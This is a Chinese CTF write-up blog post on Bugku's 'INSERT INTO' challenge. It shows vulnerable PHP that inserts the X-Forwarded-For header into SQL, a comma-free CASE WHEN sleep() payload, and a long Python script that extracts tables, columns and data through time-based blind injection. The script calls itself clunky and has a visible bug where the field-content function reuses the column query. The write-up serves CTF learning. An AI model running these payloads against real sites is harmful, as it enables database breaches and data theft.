zoukankan      html  css  js  c++  java
  • Bugku-INSERT INTO 注入

    INSERT INTO 注入

    给了源码

    error_reporting(0);
    
    function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
    $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
    
    }
    
    $host="localhost";
    $user="";
    $pass="";
    $db="";
    
    $connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
    
    mysql_select_db($db) or die("Unable to select database");
    
    $ip = getIp();
    echo 'your ip is :'.$ip;
    $sql="insert into client_ip (ip) values ('$ip')";
    mysql_query($sql);
    

    代码逻辑很清晰,把传入的HTTP_X_FORWARDED_FOR的值插入到数据库里

    HTTP_X_FORWARDED_FOR通过X-Forwarded-For来传入

    但这里需要注意,插入的只是HTTP_X_FORWARDED_FOR里第一个逗号前的部分,所以不能使用逗号

    • 使用select case when x then x else x end语句来代替if(x,x,x)
    • 使用from a for b语句来代替limit a,b

    验证语句x-forwarded-For: 1.1.1.1'+(select case when(1) then sleep(4) else 1 end) + '1

    然后写脚本爆破就可以了

    这个脚本比较全但是很笨重,缺少对错误的处理,实际用的时候有很多地方也是不必要的,可以根据需求自行修改

    ps:直接跑基本跑不出来,建议根据思想自己动手写/修改

    """
    Title: SQLi_Time
    Author: Recol
    Date: 2020-04-01
    """
    import requests
    
    url = 'http://123.206.87.240:8002/web15/'
    table_number_sql = "1.1.1.1'+(select case when((select length(table_name) from information_schema.tables where table_schema=database() limit 1 offset %d)>0)then sleep(4) else 1 end) + '1"
    table_length_sql = "1.1.1.1'+(select case when((select length(table_name) from information_schema.tables where table_schema=database() limit 1 offset %d)=%d)then sleep(4) else 1 end) + '1"
    table_name_sql = "1.1.1.1'+(select case when(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1 offset %d) from %d for 1))=%d)then sleep(4) else 1 end) + '1"
    column_number_sql = "1.1.1.1'+(select case when((select length(column_name) from information_schema.columns where table_name='%s' limit 1 offset %d)>0)then sleep(4) else 1 end) + '1"
    column_length_sql = "1.1.1.1'+(select case when((select length(column_name) from information_schema.columns where table_name='%s' limit 1 offset %d)=%d)then sleep(4) else 1 end) + '1"
    column_name_sql = "1.1.1.1'+(select case when(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='%s' limit 1 offset %d) from %d for 1))=%d)then sleep(4) else 1 end) + '1"
    field_number_sql = "1.1.1.1'+(select case when((select length(%s) from %s limit 1 offset %d)>0)then sleep(4) else 1 end) + '1"
    field_length_sql = "1.1.1.1'+(select case when((select length(%s) from %s limit 1 offset %d)=%d)then sleep(4) else 1 end) + '1"
    field_name_sql = "1.1.1.1'+(select case when(ascii(substr((select group_concat(%s) from %s limit 1 offset %d) from %d for 1))=%d)then sleep(4) else 1 end) + '1"
    headers = {
        'X-Forwarded-For': '',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.9 Safari/537.36'
    }
    
    
    def get_table_number():
        for i in range(100):
            sql = table_number_sql % i
            header_ = headers
            header_['X-Forwarded-For'] = sql
            try:
                res = requests.get(url=url, headers=header_, timeout=3)
            except requests.exceptions.ReadTimeout:
                continue
            else:
                print('table_number: ' + str(i + 1))
                return i + 1
    
    
    def get_table_length(x):
        for i in range(100):
            sql = table_length_sql % (x, i)
            header_ = headers
            header_['X-Forwarded-For'] = sql
            try:
                res = requests.get(url=url, headers=header_, timeout=3)
            except requests.exceptions.ReadTimeout:
                print('table_length: ' + str(i))
                return i
    
    
    def get_table_name(length, seq):
        name = ''
        for x in range(length + 1):
            for i in range(30, 200):
                sql = table_name_sql % (seq, x, i)
                header_ = headers
                header_['X-Forwarded-For'] = sql
                try:
                    res = requests.get(url=url, headers=header_, timeout=3)
                except requests.exceptions.ReadTimeout:
                    print(chr(i), end='')
                    name += chr(i)
        return name
    
    
    def get_column_number(table_name):
        for i in range(100):
            sql = column_number_sql % (table_name, i)
            header_ = headers
            header_['X-Forwarded-For'] = sql
            try:
                res = requests.get(url=url, headers=header_, timeout=3)
            except requests.exceptions.ReadTimeout:
                continue
            else:
                print('column_number: ' + str(i + 1))
                return i + 1
    
    
    def get_column_length(table_name, seq):
        for i in range(100):
            sql = column_length_sql % (table_name, seq, i)
            header_ = headers
            header_['X-Forwarded-For'] = sql
            try:
                res = requests.get(url=url, headers=header_, timeout=3)
            except requests.exceptions.ReadTimeout:
                print('column_length: ' + str(i))
                return i
    
    
    def get_column_name(length, table_name, seq):
        name = ''
        for x in range(length + 1):
            for i in range(30, 200):
                sql = column_name_sql % (table_name, seq, x, i)
                header_ = headers
                header_['X-Forwarded-For'] = sql
                try:
                    res = requests.get(url=url, headers=header_, timeout=3)
                except requests.exceptions.ReadTimeout:
                    print(chr(i), end='')
                    name += chr(i)
        print(name)
        return name
    
    
    def get_field_numbers(table_name, column_name):
        for i in range(100):
            sql = field_number_sql % (column_name, table_name, i)
            header_ = headers
            header_['X-Forwarded-For'] = sql
            try:
                res = requests.get(url=url, headers=header_, timeout=3)
            except requests.exceptions.ReadTimeout:
                continue
            else:
                print('field_number: ' + str(i + 1))
                return i + 1
    
    
    def get_field_length(table_name, column_name, seq):
        for i in range(100):
            sql = field_length_sql % (column_name, table_name, seq, i)
            header_ = headers
            header_['X-Forwarded-For'] = sql
            try:
                res = requests.get(url=url, headers=header_, timeout=3)
            except requests.exceptions.ReadTimeout:
                print('field_length: ' + str(i))
                return i
    
    
    def get_field_content(column_name, table_name, seq, length):
        name = ''
        for x in range(length + 1):
            for i in range(30, 200):
                sql = column_name_sql % (column_name, table_name, seq, x, i)
                header_ = headers
                header_['X-Forwarded-For'] = sql
                try:
                    res = requests.get(url=url, headers=header_, timeout=3)
                except requests.exceptions.ReadTimeout:
                    print(chr(i), end='')
                    name += chr(i)
        print(name)
        return name
    
    
    def start():
        table_number = get_table_number()
        res = {}
        for i in range(table_number):
            table_length = get_table_length(i)
            table_name = get_table_name(table_length, i)
            column_number = get_column_number(table_name)
            res[table_name] = {}
            for x in range(column_number):
                column_length = get_column_length(table_name, x)
                column_name = get_column_name(column_length, table_name, x)
                res[table_name][column_name] = []
                field_number = get_field_numbers(table_name, column_name)
                for s in range(field_number):
                    field_length = get_field_length(table_name, column_name, s)
                    field_content = get_field_content(column_name, table_name, s, field_length)
                    res[table_name][column_name].append(field_content)
    
        print(res)
    
    
    start()
    
    
  • 相关阅读:
    配置apache的文件访问路径
    php 常量const
    php接口interface的使用
    php 抽象类abstract
    php 面向对象三大特点:封装、继承、多态
    程序员的情怀《从前慢》木心
    php static静态属性和静态方法
    php面向对象的构造方法与析构方法
    关于php变量的赋值和引用的区别
    angular4.0微信oAuth第三方认证的正确方式
  • 原文地址:https://www.cnblogs.com/R3col/p/12617189.html
Copyright © 2011-2022 走看看